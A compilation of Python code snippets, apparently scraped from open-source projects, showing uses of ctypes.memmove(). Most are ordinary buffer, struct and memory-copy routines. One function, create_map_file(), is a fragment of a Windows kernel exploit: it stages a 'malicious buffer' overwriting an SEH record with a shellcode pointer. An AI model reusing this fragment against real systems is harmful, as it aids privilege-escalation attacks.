我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用ctypes.memmove()。
def __new__(self):
    """Create an instance pre-loaded with a canned settings payload.

    The hex dump below is decoded into bytes and copied over the
    ``set_settings_request`` member of the newly created object.
    """
    b = (
        "00 00 00 00 14 01 00 00 03 00 10 01 00 01 0C 01 0B 01 02 00"
        " 02 00 01 01 02 01 02 01 2A 00 47 50 53 20 54 72 61 63 6B 20"
        " 50 4F 44 00 00 00 01 00 00 00 02 00 01 00 01 00 00 00 00 00"
        " 00 00 00 00 00 00 00 00 01 00 00 00 05 01 D0 00 06 01 3C 00"
        " 07 01 02 00 11 01 08 01 08 00 09 01 04 00 00 00 08 00 08 01"
        " 08 00 09 01 04 00 01 00 08 00 08 01 1A 00 09 01 04 00 02 00"
        " 00 00 0A 01 02 00 10 00 0A 01 02 00 01 00 0A 01 02 00 FE FF"
        " 06 01 42 00 07 01 02 00 23 01 08 01 08 00 09 01 04 00 00 00"
        " 08 00 08 01 08 00 09 01 04 00 01 00 28 00 08 01 20 00 09 01"
        " 04 00 02 00 00 00 0A 01 02 00 10 00 0A 01 02 00 08 00 0A 01"
        " 02 00 01 00 0A 01 02 00 FE FF 06 01 3C 00 07 01 02 00 22 01"
        " 08 01 08 00 09 01 04 00 00 00 18 00 08 01 08 00 09 01 04 00"
        " 01 00 19 00 08 01 1A 00 09 01 04 00 02 00 00 00 0A 01 02 00"
        " 32 00 0A 01 02 00 1A 00 0A 01 02 00 10 00 06 01 06 00 07 01"
        " 02 00 50 01"
    )
    # One byte per space-separated hex pair.
    payload = bytes(int(octet, 16) for octet in b.split(" "))
    instance = super().__new__(self)
    # NOTE(review): nothing checks len(payload) against the size of
    # set_settings_request -- confirm the member is large enough.
    ctypes.memmove(
        ctypes.addressof(instance.set_settings_request), payload, len(payload)
    )
    return instance
def expand_array_in_blocks(m, block_length, offset):
    """Build a new array whose rows are runs of consecutive rows of *m*.

    Output row ``i`` is filled with ``block_length`` consecutive rows of
    *m*, starting at row ``i + offset``, copied as raw memory.  When
    *offset* is positive the block length is forced to 1.  The number of
    output rows comes from ``n_blocks`` (defined elsewhere).

    NOTE(review): the copy uses ``m.strides[0]`` as the row size, so it
    presumably expects a C-contiguous 2-D array -- confirm with callers.
    """
    n_rows, n_cols = m.shape
    n_rows = n_blocks(n_rows, block_length)
    if offset > 0:
        block_length = 1
    n_cols = n_cols * block_length

    output = np.ndarray((n_rows, n_cols), dtype=m.dtype)
    row_bytes = m.strides[0]
    step = int(row_bytes)
    write_ptr = output.ctypes.data
    for row in xrange(n_rows):
        read_ptr = m.ctypes.data + int((row + offset) * row_bytes)
        for _ in xrange(block_length):
            ctypes.memmove(write_ptr, read_ptr, row_bytes)
            write_ptr += step
            read_ptr += step
    return output
def __delitem__(self, i):
    """Delete the element at index *i* (negative indices count from the end).

    Raises IndexError when *i* is outside the list.  The backing array is
    compacted once the preallocated capacity exceeds twice the new size.
    """
    count = self.size
    if i >= count:
        raise IndexError("list index out of range")
    if i < 0:
        i += count
        if i < 0:
            raise IndexError("list index out of range")

    # Close the gap by sliding the tail one slot towards the front.
    item_bytes = self._typesize
    gap = ctypes.addressof(self.data) + i * item_bytes
    ctypes.memmove(gap, gap + item_bytes, item_bytes * (count - i - 1))

    count -= 1
    self.size = count
    if self.prealloc_size > count * 2:
        self.compact()
def append(self, obj):
    """Append *obj* to the list; it must be assignable to the element ctype.

    When the preallocated array is full, a larger array is allocated and
    the existing contents are copied across before the new item is stored.
    """
    count = self.size
    if count >= self.prealloc_size:
        # ctypes has no realloc, so growth means allocate-and-copy.  The
        # step follows Python's list growth pattern:
        # 0, 4, 8, 16, 25, 35, 46, 58, 72, 88, ...
        headroom = 3 if count < 9 else 6
        capacity = (count >> 3) + headroom + count
        grown = (self.c_type * capacity)()
        ctypes.memmove(grown, self.data, ctypes.sizeof(self.data))
        self.data = grown
        self.prealloc_size = capacity
    self.data[count] = obj
    self.size = count + 1
def append_kwargs(self, **kwargs):
    """Append a new item and assign each keyword argument as an attribute on it.

    The new slot is taken from the backing array (grown first if it is
    full, using the same growth step as ``append``) and every ``key=value``
    pair is applied to it with ``setattr``.
    """
    size = self.size
    if size >= self.prealloc_size:
        if size < 9:
            newsize = (size >> 3) + 3 + size
        else:
            newsize = (size >> 3) + 6 + size
        newdata = (self.c_type * newsize)()
        ctypes.memmove(newdata, self.data, ctypes.sizeof(self.data))
        self.data = newdata
        self.prealloc_size = newsize
    obj = self.data[size]
    # dict.items() exists on both Python 2 and 3; iteritems() is Python 2 only.
    for k, v in kwargs.items():
        setattr(obj, k, v)
    self.size = size + 1
def get_struct(input_stream, start_offset, class_name, param_list=None):
    """Instantiate *class_name* and fill it from *input_stream* at *start_offset*.

    *param_list*, when given, is unpacked as positional arguments to the
    structure constructor.  If the offset lies beyond ``file_end`` or the
    stream is too short to fill the structure, an error is printed and
    ``mce_exit(1)`` is called.
    """
    ctor_args = [] if param_list is None else param_list
    structure = class_name(*ctor_args)  # Unpack parameter list

    struct_len = ctypes.sizeof(structure)
    struct_data = input_stream[start_offset:start_offset + struct_len]
    fit_len = min(len(struct_data), struct_len)
    incomplete = fit_len < struct_len

    if start_offset > file_end or incomplete:
        print(col_r + "Error: Offset 0x%X out of bounds, possibly incomplete image!" % start_offset + col_e)
        mce_exit(1)

    ctypes.memmove(ctypes.addressof(structure), struct_data, fit_len)
    return structure
def get_struct(input_stream, start_offset, class_name, param_list=None):
    """Instantiate *class_name* and fill it from *input_stream* at *start_offset*.

    *param_list*, when given, is unpacked as positional arguments to the
    structure constructor.  If the offset is at or beyond ``file_end`` or
    the stream is too short to fill the structure, the error is recorded in
    ``err_stor``, all stored errors are printed, the current input is
    dropped or closed, and ``mea_exit(1)`` is called.
    """
    ctor_args = [] if param_list is None else param_list
    structure = class_name(*ctor_args)  # Unpack parameter list

    struct_len = ctypes.sizeof(structure)
    struct_data = input_stream[start_offset:start_offset + struct_len]
    fit_len = min(len(struct_data), struct_len)
    incomplete = fit_len < struct_len

    if start_offset >= file_end or incomplete:
        err_stor.append(col_r + "Error: Offset 0x%X out of bounds, possibly incomplete image!" % start_offset + col_e)
        for error in err_stor:
            print(error)
        if param.multi:
            multi_drop()
        else:
            f.close()
        mea_exit(1)

    ctypes.memmove(ctypes.addressof(structure), struct_data, fit_len)
    return structure

# Initialize PrettyTable
def create_map_file():
    """Create a one-page named file mapping and copy a prepared buffer into it.

    Returns a tuple ``(suitable_memory_for_buffer, SEH_overwrite_offset)``:
    an address ``SEH_overwrite_offset`` bytes before the end of the mapped
    page, and that offset itself.

    Python 2 only (print statements, ``str`` used as a byte buffer).
    NOTE(review): the return values of CreateFileMappingA and MapViewOfFile
    are used without any failure check.
    """
    page_size = 0x1000
    FILE_MAP_ALL_ACCESS = 0x1F
    SEH_overwrite_offset = 0x214
    print "[+] Creating file mapping"
    # -1 as the file handle; the mapping is named "SharedMemory" and is one page long.
    shared_memory = kernel32.CreateFileMappingA(-1, None, win32con.PAGE_EXECUTE_READWRITE, 0, page_size, "SharedMemory")
    print "[+] Mapping it to current process space"
    shared_mapped_memory_address = kernel32.MapViewOfFile( shared_memory , FILE_MAP_ALL_ACCESS, 0, 0, page_size)
    print "[+] Map View of File at address: 0x%X" % shared_mapped_memory_address
    # Address that leaves exactly SEH_overwrite_offset bytes before the end of the page.
    suitable_memory_for_buffer = shared_mapped_memory_address + (page_size - SEH_overwrite_offset)
    print "[+] Suitable Memory for Buffer address: 0x%X" % suitable_memory_for_buffer
    print "[+] Constructing malicious buffer"
    # [-- JUNK FOR PAGE --][-- KERNEL BUFFER SIZE--][-- STACK COOKIE --][-- JUNK --][-- SE/SHELLCODE PTR --]
    malicious_buffer = "A" * (page_size - SEH_overwrite_offset) + "B" * 0x200 + "S" * 4 + "C" * 12 + struct.pack("<L",heap_alloc_payload())
    malicious_buffer_len = len(malicious_buffer)
    print "[+] Copying malicious buffer to file map"
    # Stage the data in a ctypes buffer so memmove can be given a raw source address.
    csrc = create_string_buffer(malicious_buffer, malicious_buffer_len)
    ctypes.memmove(shared_mapped_memory_address, addressof(csrc), malicious_buffer_len)
    return suitable_memory_for_buffer, SEH_overwrite_offset
def find_generic_password(kc_name, service, username):
    """Return the stored password for *service* / *username* as text.

    Both lookup keys are UTF-8 encoded before the call.  A failing status
    is handed to ``NotFound.raise_for_status``.  The returned password is
    decoded from UTF-8 after the native buffer has been released.

    NOTE(review): ``open`` here is presumably a keychain context manager
    defined in this module, not the builtin -- confirm.
    """
    user_bytes = username.encode('utf-8')
    service_bytes = service.encode('utf-8')

    with open(kc_name) as keychain:
        pw_length = c_uint32()
        pw_data = c_void_p()
        status = SecKeychainFindGenericPassword(
            keychain,
            len(service_bytes),
            service_bytes,
            len(user_bytes),
            user_bytes,
            pw_length,
            pw_data,
            None,
        )

    NotFound.raise_for_status(status, "Can't fetch password from Keychain")

    # Copy the secret out before the native buffer is freed.
    n_bytes = pw_length.value
    password = ctypes.create_string_buffer(n_bytes)
    ctypes.memmove(password, pw_data.value, n_bytes)
    SecKeychainItemFreeContent(None, pw_data)
    return password.raw.decode('utf-8')
def consume(self, bytes, audio_format):
    """Drop *bytes* bytes from the front of the packet and clear all events.

    Consuming the whole packet (or more) empties it and advances the
    timestamp by the remaining duration.  Otherwise length, duration and
    timestamp are adjusted using ``audio_format.bytes_per_second``.
    """
    self.events = ()

    if bytes >= self.length:
        self.data = None
        self.length = 0
        self.timestamp += self.duration
        self.duration = 0.
        return
    if bytes == 0:
        return

    if not isinstance(self.data, str):
        # XXX Copy the whole packet into a string buffer and slice that.
        # Pointer arithmetic would avoid the copy, but this is simpler and
        # is presumed to be faster than fiddling with ctypes.
        staging = ctypes.create_string_buffer(self.length)
        ctypes.memmove(staging, self.data, self.length)
        self.data = staging

    self.data = self.data[bytes:]
    self.length -= bytes
    elapsed = bytes / float(audio_format.bytes_per_second)
    self.duration -= elapsed
    self.timestamp += elapsed
def update(self, source):
    """
    Update the overlay with a new source of data.

    The new *source* buffer must have the same size as the original
    buffer used to create the overlay. There is currently no method for
    changing the size of an existing overlay (remove and recreate the
    overlay if you require this).
    """
    port = self.renderer[0].input[0]
    video = port[0].format[0].es[0].video
    # Three bytes per pixel over the port's configured frame dimensions.
    frame_type = ct.c_uint8 * (video.width * video.height * 3)
    try:
        frame = frame_type.from_buffer(source)
    except TypeError:
        # from_buffer rejected the source; fall back to copying it.
        frame = frame_type.from_buffer_copy(source)

    buf = mmal.mmal_queue_get(self.pool[0].queue)
    if not buf:
        raise PiCameraRuntimeError(
            "Couldn't get a buffer from the overlay's pool")

    # NOTE(review): the copy length is the pool buffer's alloc_size, not the
    # size of the source frame -- confirm the two always agree.
    n_bytes = buf[0].alloc_size
    ct.memmove(buf[0].data, frame, n_bytes)
    buf[0].length = n_bytes
    mmal_check(
        mmal.mmal_port_send_buffer(port, buf),
        prefix="Unable to send a buffer to the overlay's port")
def marshal(self):
    """Serialize this Message into the wire protocol format.

    Returns a ``bytearray`` holding the marshalled bytes.  Raises
    ``CallFailed`` if ``dbus_message_marshal`` reports failure.
    """
    raw = ct.POINTER(ct.c_ubyte)()
    raw_len = ct.c_int()
    succeeded = dbus.dbus_message_marshal(self._dbobj, ct.byref(raw), ct.byref(raw_len))
    if not succeeded:
        raise CallFailed("dbus_message_marshal")

    count = raw_len.value
    result = bytearray(count)
    # Map a ctypes array over the bytearray so memmove can write into it.
    window = (ct.c_ubyte * count).from_buffer(result)
    ct.memmove(ct.addressof(window), raw, count)
    del window
    # The library allocated the buffer, so the library frees it.
    dbus.dbus_free(raw)
    return result
def ctypes2buffer(cptr, length):
    """Copy a raw memory region into a new bytearray.

    Parameters
    ----------
    cptr : ctypes.POINTER(ctypes.c_char)
        Pointer to the start of the memory region.
    length : int
        Number of bytes to copy.

    Returns
    -------
    buffer : bytearray
        A fresh bytearray holding a copy of the region.

    Raises
    ------
    TypeError
        If *cptr* is not a ``POINTER(c_char)`` instance.
    RuntimeError
        If ``memmove`` returns a false value.
    """
    char_pointer = ctypes.POINTER(ctypes.c_char)
    if not isinstance(cptr, char_pointer):
        raise TypeError('expected char pointer')

    res = bytearray(length)
    # A ctypes view over the bytearray gives memmove a writable destination.
    view = (ctypes.c_char * length).from_buffer(res)
    copied = ctypes.memmove(view, cptr, length)
    if not copied:
        raise RuntimeError('memmove failed')
    return res
def consume(self, bytes, audio_format):
    '''Remove some data from beginning of packet.  All events are cleared.

    Consuming at least the whole packet empties it: ``data`` becomes None,
    ``length`` and ``duration`` become zero, and ``timestamp`` advances by
    the remaining duration.  A partial consume trims ``data`` and adjusts
    length, duration and timestamp using ``audio_format.bytes_per_second``.
    '''
    self.events = ()

    # ">=" rather than "==": a request larger than the packet must empty
    # it, not drive length and duration negative.
    if bytes >= self.length:
        self.data = None
        self.length = 0
        self.timestamp += self.duration
        self.duration = 0.
        return
    elif bytes == 0:
        return

    if not isinstance(self.data, str):
        # XXX Create a string buffer for the whole packet then chop it up.
        # Pointer arithmetic would save a copy, but this is simpler and is
        # presumed faster than fudging around with ctypes.
        data = ctypes.create_string_buffer(self.length)
        ctypes.memmove(data, self.data, self.length)
        self.data = data
    self.data = self.data[bytes:]
    self.length -= bytes
    self.duration -= bytes / float(audio_format.bytes_per_second)
    self.timestamp += bytes / float(audio_format.bytes_per_second)
def find_generic_password(kc_name, service, username):
    """Look up a generic password and return it as decoded text.

    *service* and *username* are UTF-8 encoded for the lookup.  A failing
    status is passed to ``NotFound.raise_for_status``.  The password bytes
    are copied out, the native buffer is released, and the copy is decoded
    from UTF-8.

    NOTE(review): ``open`` is presumably this module's keychain context
    manager rather than the builtin -- confirm.
    """
    encoded_user = username.encode('utf-8')
    encoded_service = service.encode('utf-8')

    with open(kc_name) as keychain:
        out_length = c_uint32()
        out_data = c_void_p()
        status = SecKeychainFindGenericPassword(
            keychain,
            len(encoded_service),
            encoded_service,
            len(encoded_user),
            encoded_user,
            out_length,
            out_data,
            None,
        )

    failure_text = "Can't fetch password from system"
    NotFound.raise_for_status(status, failure_text)

    secret = ctypes.create_string_buffer(out_length.value)
    ctypes.memmove(secret, out_data.value, out_length.value)
    # The copy is complete, so the native buffer can go.
    SecKeychainItemFreeContent(None, out_data)
    return secret.raw.decode('utf-8')
def update(self, name, ub):
    """Upload the contents of *ub* into the uniform buffer registered as *name*.

    The buffer object is bound and mapped write-only, then
    ``ub.record_byte_size * len(ub.listy)`` bytes are copied from
    ``ub.listy`` into the mapping.  The buffer is always unmapped again.

    Raises RuntimeError if the buffer cannot be mapped.
    """
    ubo = self.UBs[name].ubo
    gl.glBindBuffer(gl.GL_UNIFORM_BUFFER, ubo)
    vp = gl.glMapBuffer(gl.GL_UNIFORM_BUFFER, gl.GL_WRITE_ONLY)
    if not vp:
        # Copying to a NULL mapping would crash the interpreter.
        raise RuntimeError("glMapBuffer failed for uniform buffer %r" % (name,))
    try:
        to_p = ctypes.c_void_p(vp)
        from_p = ctypes.c_void_p(ub.listy.ctypes.data)
        ctypes.memmove(to_p, from_p, ub.record_byte_size * len(ub.listy))
    finally:
        # Unmap even when the copy fails, so the buffer is not left mapped.
        gl.glUnmapBuffer(gl.GL_UNIFORM_BUFFER)
def _send_shmem(self, bytes):
    """Write *bytes* into the outgoing shared-memory circular buffer.

    The data is copied in fragments while the stream mutex is held.  When
    the buffer is full the mutex is released, the ``hasSpace`` object is
    waited on, and the mutex is re-acquired.  After each fragment the
    ``hasData`` event is set.

    Raises WindowsError if the mutex cannot be released or the event
    cannot be set.

    NOTE(review): 5000 appears to be the capacity of
    ``shared_memory.buffer`` -- confirm against its declaration.
    """
    # Use the outgoing stream and the outgoing shared memory.
    stream = self._streams.outgoing
    shared_memory = self._shared_memory.outgoing
    index = 0
    # Send bytes via circular buffer.
    with self.Mutex(stream.mutex) as mutex:
        while index < len(bytes):
            # Buffer full: give up the mutex until space is signalled.
            while shared_memory.isFull:
                if ctypes.windll.kernel32.ReleaseMutex(stream.mutex) == 0:
                    raise WindowsError("Could not release mutex")
                self._wait_for_object(stream.hasSpace)
                self._wait_for_object(stream.mutex)
            fragment_start = shared_memory.writeOffset
            # Contiguous room: up to the read offset if it lies ahead of
            # the write offset, otherwise up to the end of the buffer.
            max_length = (shared_memory.readOffset if fragment_start < shared_memory.readOffset else 5000)- fragment_start
            fragment_length = min(max_length, len(bytes) - index)
            ctypes.memmove(ctypes.addressof(shared_memory.buffer) + fragment_start, bytes[index:index+fragment_length], fragment_length)
            # Advance the write offset, wrapping at the end of the buffer.
            shared_memory.writeOffset = (fragment_start + fragment_length) % 5000
            index += fragment_length
            # Equal offsets straight after a write mean the buffer is full.
            shared_memory.isFull = (shared_memory.readOffset == shared_memory.writeOffset)
            if ctypes.windll.kernel32.SetEvent(stream.hasData) == 0:
                raise WindowsError("Could not set event")
def SetClipboardData(type, content):
    """
    Place text *content* on the clipboard in format *type*.

    Modeled after http://msdn.microsoft.com/en-us/library/ms649016%28VS.85%29.aspx#_win32_Copying_Information_to_the_Clipboard

    Only ``CF_TEXT`` and ``CF_UNICODETEXT`` are supported; any other
    format raises NotImplementedError.  WindowsError is raised when the
    underlying call returns None.
    """
    allocators = {
        clipboard.CF_TEXT: ctypes.create_string_buffer,
        clipboard.CF_UNICODETEXT: ctypes.create_unicode_buffer,
    }
    if type not in allocators:
        raise NotImplementedError("Only text types are supported at this time")

    # Stage the content in a ctypes buffer of the matching character width.
    staged = allocators[type](content)
    n_bytes = ctypes.sizeof(staged)
    handle_to_copy = windll.kernel32.GlobalAlloc(memory.GMEM_MOVEABLE, n_bytes)
    with LockedMemory(handle_to_copy) as lm:
        ctypes.memmove(lm.data_ptr, staged, n_bytes)

    if clipboard.SetClipboardData(type, handle_to_copy) is None:
        raise WindowsError()
def set_data(self, samples ):
    """Load *samples* into this payload.

    A list (or list subclass) is copied element by element into
    ``self.data``; items beyond ``sdds_sb_payload.NUM_SAMPLES`` are
    ignored.  Anything else is treated as a raw buffer and copied over the
    start of this object, truncated to ``ctypes.sizeof(self)``.
    """
    # isinstance, not type() ==, so list subclasses take the element path.
    if isinstance(samples, list):
        for i, x in zip(range(sdds_sb_payload.NUM_SAMPLES), samples):
            self.data[i] = x
    else:
        # NOTE(review): len(samples) is used as a byte count, which holds
        # for bytes-like input -- confirm for other buffer types.
        fit = min(len(samples), ctypes.sizeof(self))
        ctypes.memmove(ctypes.addressof(self), samples, fit)
def set_data(self, samples ):
    """Load *samples* into this payload.

    A list (or list subclass) is copied element by element into
    ``self.data``; items beyond ``sdds_cb_payload.NUM_SAMPLES`` are
    ignored.  Anything else is treated as a raw buffer and copied over the
    start of this object, truncated to ``ctypes.sizeof(self)``.
    """
    # isinstance, not type() ==, so list subclasses take the element path.
    if isinstance(samples, list):
        for i, x in zip(range(sdds_cb_payload.NUM_SAMPLES), samples):
            self.data[i] = x
    else:
        # NOTE(review): len(samples) is used as a byte count, which holds
        # for bytes-like input -- confirm for other buffer types.
        fit = min(len(samples), ctypes.sizeof(self))
        ctypes.memmove(ctypes.addressof(self), samples, fit)
def set_data(self, samples ):
    """Load *samples* into this payload.

    A list (or list subclass) is copied element by element into
    ``self.data``; items beyond ``sdds_si_payload.NUM_SAMPLES`` are
    ignored.  Anything else is treated as a raw buffer and copied over the
    start of this object, truncated to ``ctypes.sizeof(self)``.
    """
    # isinstance, not type() ==, so list subclasses take the element path.
    if isinstance(samples, list):
        for i, x in zip(range(sdds_si_payload.NUM_SAMPLES), samples):
            self.data[i] = x
    else:
        # NOTE(review): len(samples) is used as a byte count, which holds
        # for bytes-like input -- confirm for other buffer types.
        fit = min(len(samples), ctypes.sizeof(self))
        ctypes.memmove(ctypes.addressof(self), samples, fit)
def set_data(self, samples ):
    """Load *samples* into this payload.

    A list (or list subclass) is copied element by element into
    ``self.data``; items beyond ``sdds_ci_payload.NUM_SAMPLES`` are
    ignored.  Anything else is treated as a raw buffer and copied over the
    start of this object, truncated to ``ctypes.sizeof(self)``.
    """
    # isinstance, not type() ==, so list subclasses take the element path.
    if isinstance(samples, list):
        for i, x in zip(range(sdds_ci_payload.NUM_SAMPLES), samples):
            self.data[i] = x
    else:
        # NOTE(review): len(samples) is used as a byte count, which holds
        # for bytes-like input -- confirm for other buffer types.
        fit = min(len(samples), ctypes.sizeof(self))
        ctypes.memmove(ctypes.addressof(self), samples, fit)
def set_data(self, samples ):
    """Load *samples* into this payload.

    A list (or list subclass) is copied element by element into
    ``self.data``; items beyond ``sdds_sn_payload.NUM_SAMPLES`` are
    ignored.  Anything else is treated as a raw buffer and copied over the
    start of this object, truncated to ``ctypes.sizeof(self)``.
    """
    # isinstance, not type() ==, so list subclasses take the element path.
    if isinstance(samples, list):
        for i, x in zip(range(sdds_sn_payload.NUM_SAMPLES), samples):
            self.data[i] = x
    else:
        # NOTE(review): len(samples) is used as a byte count, which holds
        # for bytes-like input -- confirm for other buffer types.
        fit = min(len(samples), ctypes.sizeof(self))
        ctypes.memmove(ctypes.addressof(self), samples, fit)
def inet_ntop(address_family, packed_ip):
    """Convert a packed IP address to its text form.

    ``AF_INET`` is delegated to ``socket.inet_ntoa``.  ``AF_INET6`` is
    formatted through ``WSAAddressToStringA``.  Any other family, a packed
    address of the wrong length, or a failing conversion raises
    ``socket.error``.
    """
    if address_family == socket.AF_INET:
        return socket.inet_ntoa(packed_ip)

    addr = sockaddr()
    addr.sa_family = address_family
    addr_size = ctypes.c_int(ctypes.sizeof(addr))
    ip_string = ctypes.create_string_buffer(128)
    ip_string_size = ctypes.c_int(ctypes.sizeof(ip_string))

    if address_family != socket.AF_INET6:
        raise socket.error('unknown address family')
    if len(packed_ip) != ctypes.sizeof(addr.ipv6_addr):
        raise socket.error('packed IP wrong length for inet_ntoa')
    ctypes.memmove(addr.ipv6_addr, packed_ip, 16)

    status = WSAAddressToStringA(
        ctypes.byref(addr),
        addr_size,
        None,
        ip_string,
        ctypes.byref(ip_string_size),
    )
    if status != 0:
        raise socket.error(ctypes.FormatError())

    # Slice off the last reported character (the terminator).
    return ip_string[:ip_string_size.value - 1]
def compact(self):
    """Shrink the backing array to the number of items in use.

    Does nothing when there is no preallocated slack.
    """
    used = self.size
    if self.prealloc_size == used:
        return
    trimmed = (self.c_type * used)()
    ctypes.memmove(trimmed, self.data, used * self._typesize)
    self.data = trimmed
    self.prealloc_size = used
def write_variable(self, BType, name, value):
    """Overwrite the library variable *name* with *value*.

    *value* is converted with ``BType._to_ctypes``; the variable is
    located in ``self.cdll`` with ``BType._ctype.in_dll``.  Exactly
    ``sizeof(BType._ctype)`` bytes are copied from the converted value
    onto the variable's storage.
    """
    source = BType._to_ctypes(value)
    ctype = BType._ctype
    target = ctype.in_dll(self.cdll, name)
    ctypes.memmove(
        ctypes.addressof(target),
        ctypes.addressof(source),
        ctypes.sizeof(ctype),
    )
def read(cls, byte_object):
    """Build ``cls(byte_object)`` and copy *byte_object* into its ``data`` member.

    At most ``sizeof(instance.data)`` bytes are copied; shorter input
    leaves the remainder of ``data`` untouched.
    """
    instance = cls(byte_object)
    target = instance.data
    n_bytes = min(len(byte_object), ctypes.sizeof(target))
    ctypes.memmove(ctypes.addressof(target), bytes(byte_object), n_bytes)
    return instance
def read(cls, byte_object):
    """Create a default ``cls`` instance and overlay it with *byte_object*.

    At most ``sizeof(cls)`` bytes are copied; shorter input leaves the
    trailing part of the instance at its default value.
    """
    instance = cls()
    n_bytes = min(len(byte_object), ctypes.sizeof(cls))
    ctypes.memmove(ctypes.addressof(instance), bytes(byte_object), n_bytes)
    return instance

# Mixin to allow conversion of a ctypes structure to and from a dictionary.
def load_settings(cls, b):
    """Create a default ``cls`` instance and load *b* at ``start_of_settings``.

    The copy begins at the address of the ``start_of_settings`` member and
    is limited to the space between that member and the end of the
    structure, so input longer than the settings area is truncated.
    """
    a = cls()
    dest = ctypes.addressof(a.start_of_settings)
    # Room left from start_of_settings to the end of the object.  Clamping
    # to sizeof(a) alone would allow a write past the end whenever
    # start_of_settings is not the first member.
    room = ctypes.addressof(a) + ctypes.sizeof(a) - dest
    ctypes.memmove(dest, bytes(b), min(len(b), room))
    return a
def read(cls, byte_object):
    """Create a ``cls`` instance from *byte_object*.

    ``body_length`` is set to the input length minus ``sizeof(Command)``
    before the raw bytes (at most ``sizeof(cls)`` of them) are copied over
    the instance.
    """
    instance = cls()
    total = len(byte_object)
    instance.body_length = total - ctypes.sizeof(Command)
    ctypes.memmove(
        ctypes.addressof(instance),
        bytes(byte_object),
        min(total, ctypes.sizeof(cls)),
    )
    return instance
def __bytes__(self):
    """Return the first ``body_length + sizeof(Command)`` bytes of this object.

    NOTE(review): the length is not checked against ``sizeof(self)`` --
    confirm ``body_length`` can never exceed the object's storage.
    """
    total = self.body_length + ctypes.sizeof(Command)
    snapshot = ctypes.create_string_buffer(total)
    ctypes.memmove(snapshot, ctypes.addressof(self), total)
    return snapshot.raw
def load_payload(self, b):
    """Copy payload *b* into ``data_reply.data`` and update the length fields.

    ``body_length`` and ``command.packet_length`` are both set to
    ``len(b) + 8``.

    NOTE(review): ``len(b)`` is not checked against the size of
    ``data_reply.data`` -- confirm callers never pass more than fits.
    """
    payload_len = len(b)
    # The extra 8 accounts for "II from position, length".
    self.body_length = payload_len + 8
    destination = ctypes.addressof(self.data_reply.data)
    ctypes.memmove(destination, bytes(b), payload_len)
    self.command.packet_length = self.body_length
def try_generate_stub_target(shellcode, argument_buffer, target, errcheck=None):
    """Return a Python wrapper that calls *target* through a 64-bit stub.

    The wrapper checks the argument count against
    ``target.prototype._argtypes_``, converts every argument to an
    integer, packs them as little-endian 64-bit values into
    *argument_buffer*, and invokes the generated native caller.  The
    native caller uses *errcheck* if given, otherwise ``target.errcheck``.

    Raises ValueError when the current process is not a WoW64 process.
    """
    if not windows.current_process.is_wow_64:
        raise ValueError("Calling execute_64bits_code_from_syswow from non-syswow process")

    native_caller = generate_64bits_execution_stub_from_syswow(shellcode)
    native_caller.errcheck = target.errcheck if errcheck is None else errcheck
    expected_arguments_number = len(target.prototype._argtypes_)

    # Generate the wrapper function that fills the argument_buffer
    def wrapper(*args):
        if len(args) != expected_arguments_number:
            raise ValueError("{0} syswow accept {1} args ({2} given)".format(target.__name__, expected_arguments_number, len(args)))

        # Reduce every argument (possibly a ctypes byref) to a plain integer.
        writable_args = []
        for position, arg in enumerate(args):
            if isinstance(arg, (int, long)):
                writable_args.append(arg)
                continue
            try:
                as_integer = ctypes.cast(arg, ctypes.c_void_p).value
            except ctypes.ArgumentError:
                raise ctypes.ArgumentError("Argument {0}: wrong type <{1}>".format(position, type(arg).__name__))
            writable_args.append(as_integer)

        # One little-endian 64-bit slot per argument.
        packed = struct.pack("<" + "Q" * len(writable_args), *writable_args)
        ctypes.memmove(argument_buffer, packed, len(packed))
        # Keep the original arguments available for errcheck.
        native_caller.current_original_args = args  # TODO: THIS IS NOT THREAD SAFE
        return native_caller()

    wrapper.__name__ = "{0}<syswow64>".format(target.__name__,)
    wrapper.__doc__ = "This is a wrapper to {0} in 64b mode, it accept <{1}> args".format(target.__name__, expected_arguments_number)
    return wrapper
def swallow_ctypes_copy(ctypes_object):
    """Return a new object of the same ctypes type with identical raw bytes.

    Only the object's own storage is duplicated; memory it points to is
    not followed.
    """
    clone = type(ctypes_object)()
    n_bytes = ctypes.sizeof(clone)
    ctypes.memmove(ctypes.addressof(clone), ctypes.addressof(ctypes_object), n_bytes)
    return clone

# type replacement based on name
def _set_argv(process_name):
    """
    Overwrites our argv in a similar fashion to how it's done in C with:
    strcpy(argv[0], 'new_name');

    Does nothing when ``Py_GetArgcArgv`` is unavailable.  Raises IOError
    when the UTF-8 encoded name is longer than ``_MAX_NAME_LENGTH``.
    """
    if Py_GetArgcArgv is None:
        return

    global _PROCESS_NAME

    # both gets the current process name and initializes _MAX_NAME_LENGTH
    current_name = get_process_name()

    # NOTE(review): the local names look swapped (``argc`` holds the
    # argument vector); kept as in the original.
    argv, argc = ctypes.c_int(0), argc_t()
    Py_GetArgcArgv(argv, ctypes.pointer(argc))

    # All sizes are in bytes of the encoded name: a non-ASCII name encodes
    # to more bytes than it has characters.
    process_name_encoded = process_name.encode('utf8')
    encoded_length = len(process_name_encoded)

    if encoded_length > _MAX_NAME_LENGTH:
        raise IOError("Can't rename process to something longer than our initial name (this would overwrite memory used for the env)")

    # space we need to clear
    zero_size = max(len(current_name), encoded_length)

    ctypes.memset(argc.contents, 0, zero_size + 1)  # null terminate the string's end
    ctypes.memmove(argc.contents, process_name_encoded, encoded_length)
    _PROCESS_NAME = process_name
def _finish_wrapped_array(self, array):  # IS_PYPY
    """Copy a numpy array into the bitmap's pixel memory.

    The array is rearranged into a zero-padded staging array whose row
    width matches the bitmap pitch, and the staging array's raw bytes are
    then copied to the address returned by ``FreeImage_GetBits``.
    """
    # Query the bitmap layout.
    with self._fi as lib:
        pitch = lib.FreeImage_GetPitch(self._bitmap)
        bits = lib.FreeImage_GetBits(self._bitmap)
        bpp = lib.FreeImage_GetBPP(self._bitmap)

    # Channel count, and the row width implied by the pitch.
    nchannels = bpp // 8 // array.itemsize
    realwidth = pitch // nchannels

    # Padding needed to reach the pitch, if any.
    width = array.shape[-2]
    extra = realwidth - width
    assert 0 <= extra < 10

    # Transposed ("sort of Fortran") layout that includes the padding.
    staged = numpy.zeros((array.shape[-1], realwidth, nchannels), array.dtype)
    if nchannels == 1:
        staged[:, :width, 0] = array.T
    else:
        for channel in range(nchannels):
            staged[:, :width, channel] = array[channel, :, :].T

    # Raw copy into the bitmap.
    source_address = staged.__array_interface__['data'][0]
    ctypes.memmove(bits, source_address, staged.nbytes)
    del staged
def write_to_buffer(buffer, data, offset=0):
    """Write *data* into *buffer* starting *offset* bytes from its beginning.

    *buffer* is either a ``POINTER(c_byte)``, which is written through
